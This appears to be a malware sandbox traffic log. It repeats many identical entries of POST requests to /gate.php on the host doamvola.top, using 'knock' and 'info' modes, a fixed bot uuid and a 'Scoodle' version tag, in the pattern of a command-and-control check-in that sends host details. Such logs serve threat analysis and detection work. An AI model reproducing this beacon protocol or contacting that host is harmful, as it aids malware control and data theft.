Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: 92043542-3A67-1E19-BC53-0184572EE55Cversion: ScoodleContent-Length: 318Host: doamvola.top
